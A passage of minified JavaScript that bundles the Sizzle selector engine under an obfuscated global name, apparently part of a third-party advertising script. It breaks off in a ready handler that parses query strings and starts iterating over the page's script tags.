  893.                 if ((aD.matchesSelector = O((k = w.webkitMatchesSelector || w.mozMatchesSelector || w.oMatchesSelector || w.msMatchesSelector)))) {
  894.                     m(function(aI) {
  895.                         aD.disconnectedMatch = k.call(aI, "div");
  896.                         k.call(aI, "[s!='']:x");
  897.                         aB.push("!=", s)
  898.                     })
  899.                 }
  900.                 an = an.length && new RegExp(an.join("|"));
  901.                 aB = aB.length && new RegExp(aB.join("|"));
  902.                 P = O(w.contains) || w.compareDocumentPosition ? function(aJ, aI) {
  903.                     var aL = aJ.nodeType === 9 ? aJ.documentElement : aJ,
  904.                         aK = aI && aI.parentNode;
  905.                     return aJ === aK || !!(aK && aK.nodeType === 1 && (aL.contains ? aL.contains(aK) : aJ.compareDocumentPosition && aJ.compareDocumentPosition(aK) & 16))
  906.                 } : function(aJ, aI) {
  907.                     if (aI) {
  908.                         while ((aI = aI.parentNode)) {
  909.                             if (aI === aJ) {
  910.                                 return true
  911.                             }
  912.                         }
  913.                     }
  914.                     return false
  915.                 };
  916.                 aD.sortDetached = m(function(aI) {
  917.                     return aI.compareDocumentPosition(i.createElement("div")) & 1
  918.                 });
  919.                 N = w.compareDocumentPosition ? function(aJ, aI) {
  920.                     if (aJ === aI) {
  921.                         ah = true;
  922.                         return 0
  923.                     }
  924.                     var aK = aI.compareDocumentPosition && aJ.compareDocumentPosition && aJ.compareDocumentPosition(aI);
  925.                     if (aK) {
  926.                         if (aK & 1 || (!aD.sortDetached && aI.compareDocumentPosition(aJ) === aK)) {
  927.                             if (aJ === i || P(T, aJ)) {
  928.                                 return -1
  929.                             }
  930.                             if (aI === i || P(T, aI)) {
  931.                                 return 1
  932.                             }
  933.                             return S ? (j.call(S, aJ) - j.call(S, aI)) : 0
  934.                         }
  935.                         return aK & 4 ? -1 : 1
  936.                     }
  937.                     return aJ.compareDocumentPosition ? -1 : 1
  938.                 } : function(aJ, aI) {
  939.                     var aP, aM = 0,
  940.                         aO = aJ.parentNode,
  941.                         aL = aI.parentNode,
  942.                         aK = [aJ],
  943.                         aN = [aI];
  944.                     if (aJ === aI) {
  945.                         ah = true;
  946.                         return 0
  947.                     } else {
  948.                         if (!aO || !aL) {
  949.                             return aJ === i ? -1 : aI === i ? 1 : aO ? -1 : aL ? 1 : S ? (j.call(S, aJ) - j.call(S, aI)) : 0
  950.                         } else {
  951.                             if (aO === aL) {
  952.                                 return f(aJ, aI)
  953.                             }
  954.                         }
  955.                     }
  956.                     aP = aJ;
  957.                     while ((aP = aP.parentNode)) {
  958.                         aK.unshift(aP)
  959.                     }
  960.                     aP = aI;
  961.                     while ((aP = aP.parentNode)) {
  962.                         aN.unshift(aP)
  963.                     }
  964.                     while (aK[aM] === aN[aM]) {
  965.                         aM++
  966.                     }
  967.                     return aM ? f(aK[aM], aN[aM]) : aK[aM] === T ? -1 : aN[aM] === T ? 1 : 0
  968.                 };
  969.                 return i
  970.             };
  971.             E.matches = function(i, e) {
  972.                 return E(i, null, null, e)
  973.             };
  974.             E.matchesSelector = function(aI, aK) {
  975.                 if ((aI.ownerDocument || aI) !== L) {
  976.                     aj(aI)
  977.                 }
  978.                 aK = aK.replace(B, "='$1']");
  979.                 if (aD.matchesSelector && at && (!aB || !aB.test(aK)) && (!an || !an.test(aK))) {
  980.                     try {
  981.                         var i = k.call(aI, aK);
  982.                         if (i || aD.disconnectedMatch || aI.document && aI.document.nodeType !== 11) {
  983.                             return i
  984.                         }
  985.                     } catch (aJ) {}
  986.                 }
  987.                 return E(aK, L, null, [aI]).length > 0
  988.             };
  989.             E.contains = function(e, i) {
  990.                 if ((e.ownerDocument || e) !== L) {
  991.                     aj(e)
  992.                 }
  993.                 return P(e, i)
  994.             };
  995.             E.attr = function(aI, e) {
  996.                 if ((aI.ownerDocument || aI) !== L) {
  997.                     aj(aI)
  998.                 }
  999.                 var i = v.attrHandle[e.toLowerCase()],
  1000.                     aJ = (i && Y.call(v.attrHandle, e.toLowerCase()) ? i(aI, e, !at) : q);
  1001.                 return aJ === q ? aD.attributes || !at ? aI.getAttribute(e) : (aJ = aI.getAttributeNode(e)) && aJ.specified ? aJ.value : null : aJ
  1002.             };
  1003.             E.error = function(e) {
  1004.                 throw new Error("Syntax error, unrecognized expression: " + e)
  1005.             };
  1006.             E.uniqueSort = function(aJ) {
  1007.                 var aK, aL = [],
  1008.                     e = 0,
  1009.                     aI = 0;
  1010.                 ah = !aD.detectDuplicates;
  1011.                 S = !aD.sortStable && aJ.slice(0);
  1012.                 aJ.sort(N);
  1013.                 if (ah) {
  1014.                     while ((aK = aJ[aI++])) {
  1015.                         if (aK === aJ[aI]) {
  1016.                             e = aL.push(aI)
  1017.                         }
  1018.                     }
  1019.                     while (e--) {
  1020.                         aJ.splice(aL[e], 1)
  1021.                     }
  1022.                 }
  1023.                 return aJ
  1024.             };
  1025.             R = E.getText = function(aL) {
  1026.                 var aK, aI = "",
  1027.                     aJ = 0,
  1028.                     e = aL.nodeType;
  1029.                 if (!e) {
  1030.                     for (;
  1031.                         (aK = aL[aJ]); aJ++) {
  1032.                         aI += R(aK)
  1033.                     }
  1034.                 } else {
  1035.                     if (e === 1 || e === 9 || e === 11) {
  1036.                         if (typeof aL.textContent === "string") {
  1037.                             return aL.textContent
  1038.                         } else {
  1039.                             for (aL = aL.firstChild; aL; aL = aL.nextSibling) {
  1040.                                 aI += R(aL)
  1041.                             }
  1042.                         }
  1043.                     } else {
  1044.                         if (e === 3 || e === 4) {
  1045.                             return aL.nodeValue
  1046.                         }
  1047.                     }
  1048.                 }
  1049.                 return aI
  1050.             };
  1051.             v = E.selectors = {
  1052.                 cacheLength: 50,
  1053.                 createPseudo: r,
  1054.                 match: am,
  1055.                 attrHandle: {},
  1056.                 find: {},
  1057.                 relative: {
  1058.                     ">": {
  1059.                         dir: "parentNode",
  1060.                         first: true
  1061.                     },
  1062.                     " ": {
  1063.                         dir: "parentNode"
  1064.                     },
  1065.                     "+": {
  1066.                         dir: "previousSibling",
  1067.                         first: true
  1068.                     },
  1069.                     "~": {
  1070.                         dir: "previousSibling"
  1071.                     }
  1072.                 },
  1073.                 preFilter: {
  1074.                     ATTR: function(e) {
  1075.                         e[1] = e[1].replace(A, ap);
  1076.                         e[3] = (e[4] || e[5] || "").replace(A, ap);
  1077.                         if (e[2] === "~=") {
  1078.                             e[3] = " " + e[3] + " "
  1079.                         }
  1080.                         return e.slice(0, 4)
  1081.                     },
  1082.                     CHILD: function(e) {
  1083.                         e[1] = e[1].toLowerCase();
  1084.                         if (e[1].slice(0, 3) === "nth") {
  1085.                             if (!e[3]) {
  1086.                                 E.error(e[0])
  1087.                             }
  1088.                             e[4] = +(e[4] ? e[5] + (e[6] || 1) : 2 * (e[3] === "even" || e[3] === "odd"));
  1089.                             e[5] = +((e[7] + e[8]) || e[3] === "odd")
  1090.                         } else {
  1091.                             if (e[3]) {
  1092.                                 E.error(e[0])
  1093.                             }
  1094.                         }
  1095.                         return e
  1096.                     },
  1097.                     PSEUDO: function(i) {
  1098.                         var e, aI = !i[5] && i[2];
  1099.                         if (am.CHILD.test(i[0])) {
  1100.                             return null
  1101.                         }
  1102.                         if (i[3] && i[4] !== q) {
  1103.                             i[2] = i[4]
  1104.                         } else {
  1105.                             if (aI && ad.test(aI) && (e = p(aI, true)) && (e = aI.indexOf(")", aI.length - e) - aI.length)) {
  1106.                                 i[0] = i[0].slice(0, e);
  1107.                                 i[2] = aI.slice(0, e)
  1108.                             }
  1109.                         }
  1110.                         return i.slice(0, 3)
  1111.                     }
  1112.                 },
  1113.                 filter: {
  1114.                     TAG: function(i) {
  1115.                         var e = i.replace(A, ap).toLowerCase();
  1116.                         return i === "*" ? function() {
  1117.                             return true
  1118.                         } : function(aI) {
  1119.                             return aI.nodeName && aI.nodeName.toLowerCase() === e
  1120.                         }
  1121.                     },
  1122.                     CLASS: function(e) {
  1123.                         var i = d[e + " "];
  1124.                         return i || (i = new RegExp("(^|" + x + ")" + e + "(" + x + "|$)")) && d(e, function(aI) {
  1125.                             return i.test(typeof aI.className === "string" && aI.className || typeof aI.getAttribute !== az && aI.getAttribute("class") || "")
  1126.                         })
  1127.                     },
  1128.                     ATTR: function(aI, i, e) {
  1129.                         return function(aK) {
  1130.                             var aJ = E.attr(aK, aI);
  1131.                             if (aJ == null) {
  1132.                                 return i === "!="
  1133.                             }
  1134.                             if (!i) {
  1135.                                 return true
  1136.                             }
  1137.                             aJ += "";
  1138.                             return i === "=" ? aJ === e : i === "!=" ? aJ !== e : i === "^=" ? e && aJ.indexOf(e) === 0 : i === "*=" ? e && aJ.indexOf(e) > -1 : i === "$=" ? e && aJ.slice(-e.length) === e : i === "~=" ? (" " + aJ + " ").indexOf(e) > -1 : i === "|=" ? aJ === e || aJ.slice(0, e.length + 1) === e + "-" : false
  1139.                         }
  1140.                     },
  1141.                     CHILD: function(i, aK, aJ, aL, aI) {
  1142.                         var aN = i.slice(0, 3) !== "nth",
  1143.                             e = i.slice(-4) !== "last",
  1144.                             aM = aK === "of-type";
  1145.                         return aL === 1 && aI === 0 ? function(aO) {
  1146.                             return !!aO.parentNode
  1147.                         } : function(aU, aS, aX) {
  1148.                             var aO, a0, aV, aZ, aW, aR, aT = aN !== e ? "nextSibling" : "previousSibling",
  1149.                                 aY = aU.parentNode,
  1150.                                 aQ = aM && aU.nodeName.toLowerCase(),
  1151.                                 aP = !aX && !aM;
  1152.                             if (aY) {
  1153.                                 if (aN) {
  1154.                                     while (aT) {
  1155.                                         aV = aU;
  1156.                                         while ((aV = aV[aT])) {
  1157.                                             if (aM ? aV.nodeName.toLowerCase() === aQ : aV.nodeType === 1) {
  1158.                                                 return false
  1159.                                             }
  1160.                                         }
  1161.                                         aR = aT = i === "only" && !aR && "nextSibling"
  1162.                                     }
  1163.                                     return true
  1164.                                 }
  1165.                                 aR = [e ? aY.firstChild : aY.lastChild];
  1166.                                 if (e && aP) {
  1167.                                     a0 = aY[av] || (aY[av] = {});
  1168.                                     aO = a0[i] || [];
  1169.                                     aW = aO[0] === aE && aO[1];
  1170.                                     aZ = aO[0] === aE && aO[2];
  1171.                                     aV = aW && aY.childNodes[aW];
  1172.                                     while ((aV = ++aW && aV && aV[aT] || (aZ = aW = 0) || aR.pop())) {
  1173.                                         if (aV.nodeType === 1 && ++aZ && aV === aU) {
  1174.                                             a0[i] = [aE, aW, aZ];
  1175.                                             break
  1176.                                         }
  1177.                                     }
  1178.                                 } else {
  1179.                                     if (aP && (aO = (aU[av] || (aU[av] = {}))[i]) && aO[0] === aE) {
  1180.                                         aZ = aO[1]
  1181.                                     } else {
  1182.                                         while ((aV = ++aW && aV && aV[aT] || (aZ = aW = 0) || aR.pop())) {
  1183.                                             if ((aM ? aV.nodeName.toLowerCase() === aQ : aV.nodeType === 1) && ++aZ) {
  1184.                                                 if (aP) {
  1185.                                                     (aV[av] || (aV[av] = {}))[i] = [aE, aZ]
  1186.                                                 }
  1187.                                                 if (aV === aU) {
  1188.                                                     break
  1189.                                                 }
  1190.                                             }
  1191.                                         }
  1192.                                     }
  1193.                                 }
  1194.                                 aZ -= aI;
  1195.                                 return aZ === aL || (aZ % aL === 0 && aZ / aL >= 0)
  1196.                             }
  1197.                         }
  1198.                     },
  1199.                     PSEUDO: function(aJ, aI) {
  1200.                         var e, i = v.pseudos[aJ] || v.setFilters[aJ.toLowerCase()] || E.error("unsupported pseudo: " + aJ);
  1201.                         if (i[av]) {
  1202.                             return i(aI)
  1203.                         }
  1204.                         if (i.length > 1) {
  1205.                             e = [aJ, aJ, "", aI];
  1206.                             return v.setFilters.hasOwnProperty(aJ.toLowerCase()) ? r(function(aM, aO) {
  1207.                                 var aL, aK = i(aM, aI),
  1208.                                     aN = aK.length;
  1209.                                 while (aN--) {
  1210.                                     aL = j.call(aM, aK[aN]);
  1211.                                     aM[aL] = !(aO[aL] = aK[aN])
  1212.                                 }
  1213.                             }) : function(aK) {
  1214.                                 return i(aK, 0, e)
  1215.                             }
  1216.                         }
  1217.                         return i
  1218.                     }
  1219.                 },
  1220.                 pseudos: {
  1221.                     not: r(function(e) {
  1222.                         var i = [],
  1223.                             aI = [],
  1224.                             aJ = ag(e.replace(z, "$1"));
  1225.                         return aJ[av] ? r(function(aL, aQ, aO, aM) {
  1226.                             var aP, aK = aJ(aL, null, aM, []),
  1227.                                 aN = aL.length;
  1228.                             while (aN--) {
  1229.                                 if ((aP = aK[aN])) {
  1230.                                     aL[aN] = !(aQ[aN] = aP)
  1231.                                 }
  1232.                             }
  1233.                         }) : function(aM, aL, aK) {
  1234.                             i[0] = aM;
  1235.                             aJ(i, null, aK, aI);
  1236.                             return !aI.pop()
  1237.                         }
  1238.                     }),
  1239.                     has: r(function(e) {
  1240.                         return function(i) {
  1241.                             return E(e, i).length > 0
  1242.                         }
  1243.                     }),
  1244.                     contains: r(function(e) {
  1245.                         return function(i) {
  1246.                             return (i.textContent || i.innerText || R(i)).indexOf(e) > -1
  1247.                         }
  1248.                     }),
  1249.                     lang: r(function(e) {
  1250.                         if (!ae.test(e || "")) {
  1251.                             E.error("unsupported lang: " + e)
  1252.                         }
  1253.                         e = e.replace(A, ap).toLowerCase();
  1254.                         return function(aI) {
  1255.                             var i;
  1256.                             do {
  1257.                                 if ((i = at ? aI.lang : aI.getAttribute("xml:lang") || aI.getAttribute("lang"))) {
  1258.                                     i = i.toLowerCase();
  1259.                                     return i === e || i.indexOf(e + "-") === 0
  1260.                                 }
  1261.                             } while ((aI = aI.parentNode) && aI.nodeType === 1);
  1262.                             return false
  1263.                         }
  1264.                     }),
  1265.                     target: function(e) {
  1266.                         var i = aA.location && aA.location.hash;
  1267.                         return i && i.slice(1) === e.id
  1268.                     },
  1269.                     root: function(e) {
  1270.                         return e === w
  1271.                     },
  1272.                     focus: function(e) {
  1273.                         return e === L.activeElement && (!L.hasFocus || L.hasFocus()) && !!(e.type || e.href || ~e.tabIndex)
  1274.                     },
  1275.                     enabled: function(e) {
  1276.                         return e.disabled === false
  1277.                     },
  1278.                     disabled: function(e) {
  1279.                         return e.disabled === true
  1280.                     },
  1281.                     checked: function(e) {
  1282.                         var i = e.nodeName.toLowerCase();
  1283.                         return (i === "input" && !!e.checked) || (i === "option" && !!e.selected)
  1284.                     },
  1285.                     selected: function(e) {
  1286.                         if (e.parentNode) {
  1287.                             e.parentNode.selectedIndex
  1288.                         }
  1289.                         return e.selected === true
  1290.                     },
  1291.                     empty: function(e) {
  1292.                         for (e = e.firstChild; e; e = e.nextSibling) {
  1293.                             if (e.nodeName > "@" || e.nodeType === 3 || e.nodeType === 4) {
  1294.                                 return false
  1295.                             }
  1296.                         }
  1297.                         return true
  1298.                     },
  1299.                     parent: function(e) {
  1300.                         return !v.pseudos.empty(e)
  1301.                     },
  1302.                     header: function(e) {
  1303.                         return t.test(e.nodeName)
  1304.                     },
  1305.                     input: function(e) {
  1306.                         return h.test(e.nodeName)
  1307.                     },
  1308.                     button: function(i) {
  1309.                         var e = i.nodeName.toLowerCase();
  1310.                         return e === "input" && i.type === "button" || e === "button"
  1311.                     },
  1312.                     text: function(i) {
  1313.                         var e;
  1314.                         return i.nodeName.toLowerCase() === "input" && i.type === "text" && ((e = i.getAttribute("type")) == null || e.toLowerCase() === i.type)
  1315.                     },
  1316.                     first: ar(function() {
  1317.                         return [0]
  1318.                     }),
  1319.                     last: ar(function(e, i) {
  1320.                         return [i - 1]
  1321.                     }),
  1322.                     eq: ar(function(e, aI, i) {
  1323.                         return [i < 0 ? i + aI : i]
  1324.                     }),
  1325.                     even: ar(function(e, aJ) {
  1326.                         var aI = 0;
  1327.                         for (; aI < aJ; aI += 2) {
  1328.                             e.push(aI)
  1329.                         }
  1330.                         return e
  1331.                     }),
  1332.                     odd: ar(function(e, aJ) {
  1333.                         var aI = 1;
  1334.                         for (; aI < aJ; aI += 2) {
  1335.                             e.push(aI)
  1336.                         }
  1337.                         return e
  1338.                     }),
  1339.                     lt: ar(function(e, aK, aJ) {
  1340.                         var aI = aJ < 0 ? aJ + aK : aJ;
  1341.                         for (; --aI >= 0;) {
  1342.                             e.push(aI)
  1343.                         }
  1344.                         return e
  1345.                     }),
  1346.                     gt: ar(function(e, aK, aJ) {
  1347.                         var aI = aJ < 0 ? aJ + aK : aJ;
  1348.                         for (; ++aI < aK;) {
  1349.                             e.push(aI)
  1350.                         }
  1351.                         return e
  1352.                     })
  1353.                 }
  1354.             };
  1355.             for (G in {
  1356.                     radio: true,
  1357.                     checkbox: true,
  1358.                     file: true,
  1359.                     password: true,
  1360.                     image: true
  1361.                 }) {
  1362.                 v.pseudos[G] = F(G)
  1363.             }
  1364.             for (G in {
  1365.                     submit: true,
  1366.                     reset: true
  1367.                 }) {
  1368.                 v.pseudos[G] = g(G)
  1369.             }
  1370.  
  1371.             function p(aK, aP) {
  1372.                 var i, aL, aN, aO, aM, aI, e, aJ = au[aK + " "];
  1373.                 if (aJ) {
  1374.                     return aP ? 0 : aJ.slice(0)
  1375.                 }
  1376.                 aM = aK;
  1377.                 aI = [];
  1378.                 e = v.preFilter;
  1379.                 while (aM) {
  1380.                     if (!i || (aL = D.exec(aM))) {
  1381.                         if (aL) {
  1382.                             aM = aM.slice(aL[0].length) || aM
  1383.                         }
  1384.                         aI.push(aN = [])
  1385.                     }
  1386.                     i = false;
  1387.                     if ((aL = K.exec(aM))) {
  1388.                         i = aL.shift();
  1389.                         aN.push({
  1390.                             value: i,
  1391.                             type: aL[0].replace(z, " ")
  1392.                         });
  1393.                         aM = aM.slice(i.length)
  1394.                     }
  1395.                     for (aO in v.filter) {
  1396.                         if ((aL = am[aO].exec(aM)) && (!e[aO] || (aL = e[aO](aL)))) {
  1397.                             i = aL.shift();
  1398.                             aN.push({
  1399.                                 value: i,
  1400.                                 type: aO,
  1401.                                 matches: aL
  1402.                             });
  1403.                             aM = aM.slice(i.length)
  1404.                         }
  1405.                     }
  1406.                     if (!i) {
  1407.                         break
  1408.                     }
  1409.                 }
  1410.                 return aP ? aM.length : aM ? E.error(aK) : au(aK, aI).slice(0)
  1411.             }
  1412.  
  1413.             function o(aK) {
  1414.                 var aJ = 0,
  1415.                     aI = aK.length,
  1416.                     e = "";
  1417.                 for (; aJ < aI; aJ++) {
  1418.                     e += aK[aJ].value
  1419.                 }
  1420.                 return e
  1421.             }
  1422.  
  1423.             function y(aK, aI, aJ) {
  1424.                 var e = aI.dir,
  1425.                     aL = aJ && e === "parentNode",
  1426.                     i = ao++;
  1427.                 return aI.first ? function(aO, aN, aM) {
  1428.                     while ((aO = aO[e])) {
  1429.                         if (aO.nodeType === 1 || aL) {
  1430.                             return aK(aO, aN, aM)
  1431.                         }
  1432.                     }
  1433.                 } : function(aQ, aO, aN) {
  1434.                     var aS, aM, aP, aR = aE + " " + i;
  1435.                     if (aN) {
  1436.                         while ((aQ = aQ[e])) {
  1437.                             if (aQ.nodeType === 1 || aL) {
  1438.                                 if (aK(aQ, aO, aN)) {
  1439.                                     return true
  1440.                                 }
  1441.                             }
  1442.                         }
  1443.                     } else {
  1444.                         while ((aQ = aQ[e])) {
  1445.                             if (aQ.nodeType === 1 || aL) {
  1446.                                 aP = aQ[av] || (aQ[av] = {});
  1447.                                 if ((aM = aP[e]) && aM[0] === aR) {
  1448.                                     if ((aS = aM[1]) === true || aS === l) {
  1449.                                         return aS === true
  1450.                                     }
  1451.                                 } else {
  1452.                                     aM = aP[e] = [aR];
  1453.                                     aM[1] = aK(aQ, aO, aN) || l;
  1454.                                     if (aM[1] === true) {
  1455.                                         return true
  1456.                                     }
  1457.                                 }
  1458.                             }
  1459.                         }
  1460.                     }
  1461.                 }
  1462.             }
  1463.  
  1464.             function aG(e) {
  1465.                 return e.length > 1 ? function(aL, aK, aI) {
  1466.                     var aJ = e.length;
  1467.                     while (aJ--) {
  1468.                         if (!e[aJ](aL, aK, aI)) {
  1469.                             return false
  1470.                         }
  1471.                     }
  1472.                     return true
  1473.                 } : e[0]
  1474.             }
  1475.  
  1476.             function ak(e, aI, aJ, aK, aN) {
  1477.                 var aL, aQ = [],
  1478.                     aM = 0,
  1479.                     aO = e.length,
  1480.                     aP = aI != null;
  1481.                 for (; aM < aO; aM++) {
  1482.                     if ((aL = e[aM])) {
  1483.                         if (!aJ || aJ(aL, aK, aN)) {
  1484.                             aQ.push(aL);
  1485.                             if (aP) {
  1486.                                 aI.push(aM)
  1487.                             }
  1488.                         }
  1489.                     }
  1490.                 }
  1491.                 return aQ
  1492.             }
  1493.  
  1494.             function n(aI, i, aK, aJ, aL, e) {
  1495.                 if (aJ && !aJ[av]) {
  1496.                     aJ = n(aJ)
  1497.                 }
  1498.                 if (aL && !aL[av]) {
  1499.                     aL = n(aL, e)
  1500.                 }
  1501.                 return r(function(aW, aT, aO, aV) {
  1502.                     var aY, aU, aQ, aP = [],
  1503.                         aX = [],
  1504.                         aN = aT.length,
  1505.                         aM = aW || I(i || "*", aO.nodeType ? [aO] : aO, []),
  1506.                         aR = aI && (aW || !i) ? ak(aM, aP, aI, aO, aV) : aM,
  1507.                         aS = aK ? aL || (aW ? aI : aN || aJ) ? [] : aT : aR;
  1508.                     if (aK) {
  1509.                         aK(aR, aS, aO, aV)
  1510.                     }
  1511.                     if (aJ) {
  1512.                         aY = ak(aS, aX);
  1513.                         aJ(aY, [], aO, aV);
  1514.                         aU = aY.length;
  1515.                         while (aU--) {
  1516.                             if ((aQ = aY[aU])) {
  1517.                                 aS[aX[aU]] = !(aR[aX[aU]] = aQ)
  1518.                             }
  1519.                         }
  1520.                     }
  1521.                     if (aW) {
  1522.                         if (aL || aI) {
  1523.                             if (aL) {
  1524.                                 aY = [];
  1525.                                 aU = aS.length;
  1526.                                 while (aU--) {
  1527.                                     if ((aQ = aS[aU])) {
  1528.                                         aY.push((aR[aU] = aQ))
  1529.                                     }
  1530.                                 }
  1531.                                 aL(null, (aS = []), aY, aV)
  1532.                             }
  1533.                             aU = aS.length;
  1534.                             while (aU--) {
  1535.                                 if ((aQ = aS[aU]) && (aY = aL ? j.call(aW, aQ) : aP[aU]) > -1) {
  1536.                                     aW[aY] = !(aT[aY] = aQ)
  1537.                                 }
  1538.                             }
  1539.                         }
  1540.                     } else {
  1541.                         aS = ak(aS === aT ? aS.splice(aN, aS.length) : aS);
  1542.                         if (aL) {
  1543.                             aL(null, aT, aS, aV)
  1544.                         } else {
  1545.                             b.apply(aT, aS)
  1546.                         }
  1547.                     }
  1548.                 })
  1549.             }
  1550.  
  1551.             function aw(aN) {
  1552.                 var aI, aL, aJ, aM = aN.length,
  1553.                     aQ = v.relative[aN[0].type],
  1554.                     aR = aQ || v.relative[" "],
  1555.                     aK = aQ ? 1 : 0,
  1556.                     aO = y(function(i) {
  1557.                         return i === aI
  1558.                     }, aR, true),
  1559.                     aP = y(function(i) {
  1560.                         return j.call(aI, i) > -1
  1561.                     }, aR, true),
  1562.                     e = [function(aT, aS, i) {
  1563.                         return (!aQ && (i || aS !== aH)) || ((aI = aS).nodeType ? aO(aT, aS, i) : aP(aT, aS, i))
  1564.                     }];
  1565.                 for (; aK < aM; aK++) {
  1566.                     if ((aL = v.relative[aN[aK].type])) {
  1567.                         e = [y(aG(e), aL)]
  1568.                     } else {
  1569.                         aL = v.filter[aN[aK].type].apply(null, aN[aK].matches);
  1570.                         if (aL[av]) {
  1571.                             aJ = ++aK;
  1572.                             for (; aJ < aM; aJ++) {
  1573.                                 if (v.relative[aN[aJ].type]) {
  1574.                                     break
  1575.                                 }
  1576.                             }
  1577.                             return n(aK > 1 && aG(e), aK > 1 && o(aN.slice(0, aK - 1).concat({
  1578.                                 value: aN[aK - 2].type === " " ? "*" : ""
  1579.                             })).replace(z, "$1"), aL, aK < aJ && aw(aN.slice(aK, aJ)), aJ < aM && aw((aN = aN.slice(aJ))), aJ < aM && o(aN))
  1580.                         }
  1581.                         e.push(aL)
  1582.                     }
  1583.                 }
  1584.                 return aG(e)
  1585.             }
  1586.  
  1587.             function ai(aJ, aI) {
  1588.                 var aL = 0,
  1589.                     e = aI.length > 0,
  1590.                     aK = aJ.length > 0,
  1591.                     i = function(aV, aP, aU, aT, a1) {
  1592.                         var aQ, aR, aW, a0 = [],
  1593.                             aZ = 0,
  1594.                             aS = "0",
  1595.                             aM = aV && [],
  1596.                             aX = a1 != null,
  1597.                             aY = aH,
  1598.                             aO = aV || aK && v.find.TAG("*", a1 && aP.parentNode || aP),
  1599.                             aN = (aE += aY == null ? 1 : Math.random() || 0.1);
  1600.                         if (aX) {
  1601.                             aH = aP !== L && aP;
  1602.                             l = aL
  1603.                         }
  1604.                         for (;
  1605.                             (aQ = aO[aS]) != null; aS++) {
  1606.                             if (aK && aQ) {
  1607.                                 aR = 0;
  1608.                                 while ((aW = aJ[aR++])) {
  1609.                                     if (aW(aQ, aP, aU)) {
  1610.                                         aT.push(aQ);
  1611.                                         break
  1612.                                     }
  1613.                                 }
  1614.                                 if (aX) {
  1615.                                     aE = aN;
  1616.                                     l = ++aL
  1617.                                 }
  1618.                             }
  1619.                             if (e) {
  1620.                                 if ((aQ = !aW && aQ)) {
  1621.                                     aZ--
  1622.                                 }
  1623.                                 if (aV) {
  1624.                                     aM.push(aQ)
  1625.                                 }
  1626.                             }
  1627.                         }
  1628.                         aZ += aS;
  1629.                         if (e && aS !== aZ) {
  1630.                             aR = 0;
  1631.                             while ((aW = aI[aR++])) {
  1632.                                 aW(aM, a0, aP, aU)
  1633.                             }
  1634.                             if (aV) {
  1635.                                 if (aZ > 0) {
  1636.                                     while (aS--) {
  1637.                                         if (!(aM[aS] || a0[aS])) {
  1638.                                             a0[aS] = ay.call(aT)
  1639.                                         }
  1640.                                     }
  1641.                                 }
  1642.                                 a0 = ak(a0)
  1643.                             }
  1644.                             b.apply(aT, a0);
  1645.                             if (aX && !aV && a0.length > 0 && (aZ + aI.length) > 1) {
  1646.                                 E.uniqueSort(aT)
  1647.                             }
  1648.                         }
  1649.                         if (aX) {
  1650.                             aE = aN;
  1651.                             aH = aY
  1652.                         }
  1653.                         return aM
  1654.                     };
  1655.                 return e ? r(i) : i
  1656.             }
  1657.             ag = E.compile = function(e, aM) {
  1658.                 var aJ, aI = [],
  1659.                     aL = [],
  1660.                     aK = Q[e + " "];
  1661.                 if (!aK) {
  1662.                     if (!aM) {
  1663.                         aM = p(e)
  1664.                     }
  1665.                     aJ = aM.length;
  1666.                     while (aJ--) {
  1667.                         aK = aw(aM[aJ]);
  1668.                         if (aK[av]) {
  1669.                             aI.push(aK)
  1670.                         } else {
  1671.                             aL.push(aK)
  1672.                         }
  1673.                     }
  1674.                     aK = Q(e, ai(aL, aI))
  1675.                 }
  1676.                 return aK
  1677.             };
  1678.  
  1679.             function I(aI, aL, aK) {
  1680.                 var aJ = 0,
  1681.                     e = aL.length;
  1682.                 for (; aJ < e; aJ++) {
  1683.                     E(aI, aL[aJ], aK)
  1684.                 }
  1685.                 return aK
  1686.             }
  1687.  
  1688.             function aC(aJ, e, aK, aN) {
  1689.                 var aL, aP, aI, aQ, aO, aM = p(aJ);
  1690.                 if (!aN) {
  1691.                     if (aM.length === 1) {
  1692.                         aP = aM[0] = aM[0].slice(0);
  1693.                         if (aP.length > 2 && (aI = aP[0]).type === "ID" && aD.getById && e.nodeType === 9 && at && v.relative[aP[1].type]) {
  1694.                             e = (v.find.ID(aI.matches[0].replace(A, ap), e) || [])[0];
  1695.                             if (!e) {
  1696.                                 return aK
  1697.                             }
  1698.                             aJ = aJ.slice(aP.shift().value.length)
  1699.                         }
  1700.                         aL = am.needsContext.test(aJ) ? 0 : aP.length;
  1701.                         while (aL--) {
  1702.                             aI = aP[aL];
  1703.                             if (v.relative[(aQ = aI.type)]) {
  1704.                                 break
  1705.                             }
  1706.                             if ((aO = v.find[aQ])) {
  1707.                                 if ((aN = aO(aI.matches[0].replace(A, ap), al.test(aP[0].type) && e.parentNode || e))) {
  1708.                                     aP.splice(aL, 1);
  1709.                                     aJ = aN.length && o(aP);
  1710.                                     if (!aJ) {
  1711.                                         b.apply(aK, aN);
  1712.                                         return aK
  1713.                                     }
  1714.                                     break
  1715.                                 }
  1716.                             }
  1717.                         }
  1718.                     }
  1719.                 }
  1720.                 ag(aJ, aM)(aN, e, !at, aK, al.test(aJ));
  1721.                 return aK
  1722.             }
  1723.             v.pseudos.nth = v.pseudos.eq;
  1724.  
  1725.             function af() {}
  1726.             af.prototype = v.filters = v.pseudos;
  1727.             v.setFilters = new af();
  1728.             aD.sortStable = av.split("").sort(N).join("") === av;
  1729.             aj();
  1730.             [0, 0].sort(N);
  1731.             aD.detectDuplicates = ah;
  1732.             aA["__twb__72d07657ba1ad678d2"].Sizzle = E
  1733.         })(window);;
  1734.         var e = i[g].Sizzle;
  1735.         var d = i[g];
  1736.         d.Sizzle = e;
  1737.         d.demoMode = i[g].demoMode = (o);
  1738.         d.ready(function() {
  1739.             if (location.href.indexOf("thisadsfor.us") > -1) {
  1740.                 return true
  1741.             }
  1742.             var r = function(x) {
  1743.                 var A = {};
  1744.                 x = x.split("?");
  1745.                 if (x.length < 2) {
  1746.                     return A
  1747.                 }
  1748.                 var z = x[1];
  1749.                 var B = z.split("&");
  1750.                 for (var y = 0; y < B.length; y++) {
  1751.                     var C = B[y].split("=");
  1752.                     if (typeof A[C[0]] === "undefined") {
  1753.                         A[C[0]] = C[1]
  1754.                     } else {
  1755.                         if (typeof A[C[0]] === "string") {
  1756.                             var w = [A[C[0]], C[1]];
  1757.                             A[C[0]] = w
  1758.                         } else {
  1759.                             A[C[0]].push(C[1])
  1760.                         }
  1761.                     }
  1762.                 }
  1763.                 return A
  1764.             };
  1765.             var s = {};
  1766.             var p = document.getElementsByTagName("script");
  1767.             for (var t = 0; t < p.length; t++) {
  1768.                 var q = p[t];
